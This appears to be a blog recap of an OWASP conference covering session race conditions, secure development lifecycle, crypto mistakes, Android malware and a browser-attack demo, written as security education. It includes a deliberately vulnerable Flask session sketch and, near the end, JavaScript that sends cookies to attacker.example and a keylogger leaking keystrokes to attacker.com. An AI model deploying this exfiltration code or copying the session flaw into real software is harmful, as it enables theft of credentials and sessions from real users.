Dr. Anat Bremmler, representing the IDC, spoke about her commitment to security – her background is in network security, and she believes strongly in appsec. This is why this is the 6th OWASP conference to take place at the IDC. On a personal note, I would like to point out that the combination of industry – specifically the security community – and academia is a fantastic situation, and will have some wonderful results. Already, students at the IDC usually offer a presentation on some applicable research as a result of their classwork. OWASP has an interest in pushing security education all the way into universities, colleges, and such.

 

Keynote: Composite Applications Over Hybrid Clouds – Enterprise Security Challenges of the IT Supply Chain

Dr. Ethan Hadar, SVP of Corporate Technical Strategy at CA, gave a lightweight keynote address, discussing some of the challenges in combining the benefits of moving supply chain management to cloud computing with security requirements and needs. While he really didn’t say anything new, he presented the viewpoint of a CIO, who doesn’t really care much about security, except for compliance issues. Contrast this with other perspectives, such as that of a security manager, an auditor, and the end user… Often, it is the perception of security that matters, and not the actual level of security. While we in the security field would often dismiss that as “security theater”, Dr. Hadar made the case that for some stakeholders, this might be what brings the buy-in.

He also brought up an interesting issue regarding testing “composite applications” (i.e. systems that comprise 3rd-party services) or apps hosted on “cloud infrastructure”: how can you test the sub-services? What if these are hosted on IaaS/PaaS/*aaS etc.? Are you even allowed to? In what country? What if your meta-system relies on a 3rd-party service? What can you do about change management – on the subsystems?

And whose responsibility is it, anyway? Dr. Hadar suggested including security in the contractual SLA…

But then, there are also short-lived apps – what he calls “situational applications”, such as when a department pops up a website for a short timeframe.

Overall, not really anything new – but it was more about presenting the questions, providing food for thought…

The CIO doesn’t want security – it’s like talking to an insurance agent, just something you have to do – so we should be making it as painless as possible.

 

Temporal Session Race Conditions

Shay Chen, CTO of Ernst and Young’s Hacktics Advanced Security Center, demoed a new class of attack he’s calling “Temporal Session Race Condition”.

Shay attempted to log in to a simple webapp without a valid password. He overloaded the password field with too much data, causing a momentary delay… In the meantime, he opened another window and tried to jump directly to an internal page. This created a sort of race condition on the session management…

Typically, race conditions would imply some form of latency, causing the intended order of operations to change, or become unpredictable… In this case, even where no latency exists, the attacker creates it as needed, in order to force the race condition.

The success of this attack can be based on what Shay calls “Session Puzzling”. This attack is kinda complex, but in certain scenarios can allow the attacker to subvert the session generation. For example, a webserver will generate a new session id, associate the session id with the memory area, and then store the session id. Of course, this session id is sent to the user’s browser (typically via a cookie, using a Set-Cookie header), which is then reused to find the session memory.

In a Session Puzzle attack, the web app accidentally stores a special flag in the session memory – e.g. in a multi-phase password recovery process. This flag might be (and often is) the same flag that is checked by the rest of the application to verify that the user is logged in (for example, a session variable called, surprisingly, “username”).

While this is a relatively simplistic scenario (note that while it shouldn’t happen, it often does, sadly enough), the more general case, of multi-phase flow control stored in session variables, is quite common. If the session variables used to store the flow control are the same variables used elsewhere, this can be subverted by running two flows in parallel, without advancing the flow in the expected order (i.e. stop flow A after the first step, then commence flow B and continue through till the end). Likewise, it can be possible in some cases to skip steps in the flow, and jump ahead to a more interesting step – such as the phase where the password can be retrieved.
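
A minimal Flask-style sketch of the vulnerable pattern described above (the route names and the “username” session key are illustrative):

    from flask import Flask, session, request, abort

    app = Flask(__name__)
    app.secret_key = "demo-only"

    @app.route("/forgot-password/step1", methods=["POST"])
    def forgot_step1():
        # BUG: the recovery flow stores the same session key ("username")
        # that the rest of the app treats as proof of being logged in.
        session["username"] = request.form["username"]
        return "Answer your secret question in step 2"

    @app.route("/account")
    def account():
        # Any handler that only checks for the key's presence is now fooled:
        # start step 1 for a victim user, then browse straight to /account.
        if "username" not in session:
            abort(401)
        return f"Sensitive data for {session['username']}"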

Shay then went on to discuss techniques to control what he calls “productive latency” – i.e. controlling how much time a specific line of code should take. This will increase the window of opportunity to inject a specific race condition, even in cases where (flow-based) Session Puzzling does not apply. For example, what if the logon mechanism stores the username in the session before verifying the password – and if the password is incorrect, the session is invalidated (in the same function)? This is not a multi-step flow; however, by injecting the productive latency, it will be possible to create a race condition (by jumping to an internal page during the authentication attempt).

These “productive latency”-inducing techniques include regexes, loops, complex queries, and database connection pool exhaustion. He also introduced a tool (and who doesn’t love tools?) to flood a data access web page and forcefully occupy the entire connection pool for a given amount of time…

Btw, he also mentioned an architecture of two separate systems that share a backend resource – one app might be able to saturate the backend connections, thus creating latency for the other app.

At the very end, as a sort of appendix, he did discuss ways to detect such vulnerabilities – both in blackbox pentests and in code reviews. It really just comes back to finding places where an application-layer DoS is possible for any of the backend layers – such as a resource or code flow that is controlled by input (direct or indirect).

 

Building an Effective SDLC Program

This was a joint lecture between Ofer Maor (CTO of Seeker Security, formerly CTO of E&Y’s Hacktics, and also the chapter chairman) and Guy Bejerano, CSO of Liveperson. The two presented a case study of the process of implementing an SDL – security development lifecycle. They discussed their mutual experience of pulling the Liveperson development staff into SDL (Ofer’s team consulted for Liveperson on this).

One of the key challenges for Liveperson (and indeed, most SaaS providers) is providing a service – which should be secure, of course – in the cloud, and using cloud services. (This calls back to some of the challenges that Dr. Hadar referred to in his keynote). Amongst other issues, many of their high-security customers insisted on performing an external pentest on their service. On the other hand, Liveperson felt the impact of security bugs – friction, costs, reputation damage – but did not really bother to focus on the upside.

Their development started as a standard “Waterfall” process (Gladly, they didn’t eat the lunch of my own later talk, though there is some overlap…) This did present its own challenges, such as accuracy and repetitiveness of testing, and more.

They then decided to switch to an Agile lifecycle, but this created even more friction! (My talk later in the day focused on the difficulties of SDL specifically with Agile.) Ofer shared an anecdote regarding SDL-related friction: he performed a pentest for one of the larger US retailers. Finding many instances of SQL injection and over 40 other vulnerabilities, he was later told that the developers had to work overnight straight through the holiday season, just to fix what was only discovered at the end of the cycle, instead of much earlier.

Guy perceives “SDLC” as “vendor heaven” – with an overload of products, services, and more, you never know what you need, or when it’s enough, right?

They proposed a few key points to focus on, before laying out your SDL:

  • Define your requirements – focus on risk profile, including your customers’ risk requirements (e.g. PCI, HIPAA, etc.). Decide where you need to get to.
  • Select a framework – for a common language; e.g. Liveperson settled on OWASP’s taxonomy.
  • Who leads the program? For a very technical org (such as any software company), it can no longer be just the CSO, but you have to create ownership in the dev teams.

For example, the system owner needs to accept security as one of the operational requirements… and it then becomes his responsibility to deliver. Also, it’s best if you can make security leaders (or “champions”) out of the best programmers.

Security then becomes part of the quality requirement. It can start with QA, by getting them interested / involved in security – then QA can find security bugs, too.

  • Knowledge sharing: there were some changes in the process from what they originally intended. They started off with a mistake, but then realized that they must create awareness. It even came to the point that watercooler talk between programmers was actually about SQL injection.
  • Penetration testing strategy (manual/automatic, blackbox/whitebox, internal/external, etc)
  • Fitting tools to platform/process
  • Operational cycle – Key Performance Indicators (for the SDL), and reviewed by owners

Encouragingly, Guy affirmed that a second round of SDL implementation, with focus on these issues, was a lot more successful.

 

Glass Box Testing – Thinking Inside the Box

Omri Weisman, manager of the Security Research Group at IBM, gave an interesting talk about their research into new forms of automated testing. (Of course, count on IBM that this will eventually be rolled into a high-end product. Btw, one of the other sponsors of the conference, Seeker Security, also has a product in this field, though I have not personally experimented with it yet).

Previously, one of the main options for automated testing was Black Box – based on sending inputs to a closed system and checking the outputs. One key drawback of this approach is the difficulty in finding hidden logic – such as magic numbers, secret parameters, and other types. Another challenge for black box testing is attacks that don’t really have noticeable results – as an example, consider SQL injection that does not return data. While there are ways around this, such as blind injection or timing attacks, this is often complex and not trivial.

Another important drawback to blackbox testing is that it is typically very difficult to trace a given issue back to the line of code that needs to be fixed. Often a programmer, tasked with fixing a vulnerability found in BB, will have to drill down through many layers of code, calling functions, configured classes, referenced modules, and pointless comments, until he finds the one single faulty line of code.

So what is GlassBox?

Omri used a very cute video to display this intuitively… Blackbox: sliding an envelope under a closed door, and getting another envelope in response. Glassbox is like sliding the envelope under the door – and then looking through the window, to see a gorilla preparing the response…. 🙂

Or, more succinctly:

Glass Box testing uses internal agents to guide application scanning

Using this direction, GB has a lot more information available – memory, structure, environment, source code, runtime configuration, actual network traffic, access to file-system, registry, database, and much more.

Glassbox offers the capability to do additional tests that you couldn’t do with straight BB – such as verifying test coverage (an important facet in security assurance), finding hidden parameters and values, backdoors, attacks with no response, DoS, and even generating exploits directly according to the existing input validation.

GB further assists the testing process, by consolidating and correlating similar issues that can be traced back to the same source, thus removing duplicates. GB can also trace the results of the external pentest, back to the specific lines of code, and can also help remove false positives.

Thus, Glassbox testing could solve the black box challenges… and moreover, this would enable an automated PT tool to automatically detect e.g. all OWASP Top 10 issues (typically, BB tools can only discover half).

 

Agile + SDL – Concepts and Misconceptions

Next up was my own talk, together with Nir Bregman from HP, explaining the difficulty in combining an SDL (Security Development Lifecycle) process with Agile methodology – but I will save the content of that for its own post, where I’ll elaborate on the whole idea behind the talk.

Without delving into the content, I will say that I had a blast delivering the talk. After a short introduction to the terminology (for those unfamiliar), we structured the first half of the talk as an aggressive back-and-forth (modeled after the “yo’ momma” contests of yore), with each of us presenting an ignorant view of the other’s methodology: I defended SDL as a security pro, showing great ignorance and pettiness with regard to Agile, while Nir respectfully displayed immaturity regarding all things security. The second half of the talk, of course, showed how to reconcile the resulting problems and presented some possibilities for implementing SDL as part of an Agile workflow.

Before that, though, we had a great lunch – thanks to all the sponsors!

 

When Crypto Goes Wrong

Erez Metula (AppSec Labs) is well-known as a great speaker, and he always puts on a great show. This time, he did not disappoint. Though there was not much new meat in his talk, it was a great back-to-basics review of common mistakes that happen when programmers try to implement cryptographic functions. (Overall, I think this was probably the most important talk of the day, at least for the programmers that attended – and at the end of the day, isn’t the whole purpose of OWASP to help programmers implement secure code?) Some of the common mistakes he covered:

  • Home grown algorithms
  • Outdated crypto (e.g. MD5, DES)
  • Bad encryption mode, e.g. AES with ECB instead of CBC (see the sketch after this list).
  • Forgetting to verify certificates – e.g. from a rich client, when calling a backend web service, or even more commonly from mobile apps.
  • Not requiring HTTPS (Don’t forget about SSLstrip…)
  • Direct access to server-side crypto functions
  • Direct access to client-side crypto functions (ex: exposed ActiveX crypto)
  • Sending hash values over an insecure transport (such as this recent question)
  • Not using salts (and pepper)
  • Leaving the key with the encrypted secrets
  • Unprotected encryption keys
  • Same symmetric key for all clients
  • Same asymmetric keys for all deployments
  • Same keys, different encryption needs (or “Crypto is not a replacement for access control”)
  • Replaying password hashes
  • Replaying encrypted blocks
  • Combining (or correlating) unrelated encrypted blocks
  • Crypto-DoS – by causing the application to RSA sign large amounts of data
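
To make the ECB point concrete, here is a minimal sketch of my own (not from Erez’s talk), using Node’s built-in crypto module. With ECB, identical plaintext blocks encrypt to identical ciphertext blocks, leaking structure; with CBC and a random IV, they do not:

const crypto = require("crypto");

const key = crypto.randomBytes(16);
// two identical 16-byte plaintext blocks
const plaintext = Buffer.from("ATTACK AT DAWN!!ATTACK AT DAWN!!");

// ECB is deterministic per block
const ecb = crypto.createCipheriv("aes-128-ecb", key, null);
const ecbOut = Buffer.concat([ecb.update(plaintext), ecb.final()]);

// CBC chains each block to the previous one, starting from a random IV
const iv = crypto.randomBytes(16);
const cbc = crypto.createCipheriv("aes-128-cbc", key, iv);
const cbcOut = Buffer.concat([cbc.update(plaintext), cbc.final()]);

console.log(ecbOut.subarray(0, 16).equals(ecbOut.subarray(16, 32))); // true – structure leaks
console.log(cbcOut.subarray(0, 16).equals(cbcOut.subarray(16, 32))); // false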

 

Hey, What’s your App doing on my (Smart)Phone?

Shay Zalalichin, CTO of Comsec Consulting (and, btw, my former boss 🙂 ), discussed various forms of mobile malware, focusing specifically on the Android platform. Just a note: this was the second of three talks about mobile security (I missed Itzik Kotler’s talk on hacking mobile apps, but I heard it was great – he also presented the results of research that Security Art performed on the most common apps in the iTunes store). This can be taken as a sign that OWASP is taking on a wider role in application security, no longer just web apps.

As an example, Shay displayed an Android app (from the Android Market) that simply displays a diamond – if you can’t afford a real diamond, you can’t afford this – but, secretly, the app accesses all the phone logs, outgoing calls, contacts, etc.

His message focused on the fact that today’s phones have a lot more functionality, connectivity – and assets. It’s a stretch to even call them “phones”… Depending on your viewpoint, a phone can provide something computers don’t have (the user’s viewpoint); but it is also really pretty much a mobile computer, with access to the same assets as a regular computer (the enterprise management viewpoint).

Whilst the mobile market is finally evolving (“year of the mobile” has been declared several years in a row, but now the stats actually back it up), mobile malware is also evolving. State-of-the-art mobile malware no longer focuses just on “sending premium SMS”; it is now actually attacking the mobile device, its stored assets, and more. Btw, it is trivial to get malware into the Android Market…

Shay explained the Android architecture, its security model (based on pieces from both Linux and Java), and Android permissions, which are based on a thick manifest and are very much not fine-grained (e.g. an app can be granted “access internet”, but there is no way to limit that to a single site, and the Same Origin Policy does not apply). Shay also discussed some of the key components of the platform, such as “intents” – basically an IPC mechanism (for intra- and inter-app communication).

Some Android specific attacks: intent sniffing, intent spoofing / injection, insecure storage, privilege manipulation and bypass, and more.

Btw, as he mentioned, OWASP has its own mobile security project. Anyway, I don’t think that I will be getting an Android phone anytime soon… 😉

 

The Bank Job II

The final talk of the day was given by Adi Sharabani, Leader of Rational’s Security Strategy and Architecture team at IBM, who ran a very nice demo of a hacker’s (sic) experience.

1. Know your target

  • Same Origin Policy (SOP), enforced by all common web browsers, prevents a page on a website from directly accessing any other website (a minimal illustration follows this list).
  • There are some ways to overcome SOP:
    • Site vulnerabilities: client side vulnerabilities, Man-in-the-Middle (MitM) – especially over unprotected Wi-Fi
    • Browser vulnerabilities, DNS vulnerabilities, Active MitM
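
As a quick illustration of SOP (a sketch of my own with placeholder domains, not part of Adi’s demo), script running on one origin cannot read a response from another origin unless that other origin explicitly allows it via CORS headers:

// running in a page served from https://site-a.example
fetch("https://site-b.example/account")
    .then(response => response.text())
    .then(body => console.log(body)) // never reached without permissive CORS headers
    .catch(err => console.log("blocked by the Same Origin Policy:", err));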

2. Executing the Attack

The attack itself takes only three steps:

1. open URL
2. sleep
3. open `javascript:alert(1)`

But what else can this vulnerability be used for? For example, stealing a user’s session id for some random other site (after login).

For example, using an external JavaScript file to request an image on the attacker’s server with the session id in the URL – the image itself is of no interest, of course, but the attacker has already received the user’s session id.
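
Something along these lines (a minimal sketch with a placeholder domain, not Adi’s exact code):

var img = document.createElement("img");
// the bogus image request smuggles the victim's cookies to the attacker's server
img.src = "http://attacker.example/steal?c=" + encodeURIComponent(document.cookie);
document.body.appendChild(img);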

  • Some challenges with the above attack scenario:
    • The victim is not yet authenticated, so stealing the session id would be pointless
    • This would be blocked by the HttpOnly cookie attribute.
  • Adi presented a JavaScript based keylogger (in only a handful of lines of code!):

function sendData(c) {
    var img = document.createElement("img");
    // each keystroke is leaked as a request for a bogus image on the attacker's server
    img.src = "http://attacker.com/" + encodeURIComponent(c);
    document.body.appendChild(img);
}
document.body.onkeypress = function (event) {
    sendData(String.fromCharCode(event.which || event.keyCode));
};

(Hmm, as I am an IntelliSense cripple, please forgive my memory if there are any syntax errors…)

  • 2-factor authentication would still prevent this attack…
    • Instead, the attacker can embed the attack directly in the client JavaScript, and have no need to steal the session id itself. (Btw, in many cases, the 2-factor authentication is only applied on the authentication page – but further session access would be based on the session id alone…)
  • Based on the above vulnerability + keylogger, a malicious app could easily permanently poison any browser session running on the device! (Adi also showed a workaround for unload events, e.g. if the user closes the browser you don’t want to keep poisoning the session.)

Boom, there you have it – the attacker is now in total control of all browsing you do from your mobile phone…

What an encouraging note to end the day 😀

Filed under Community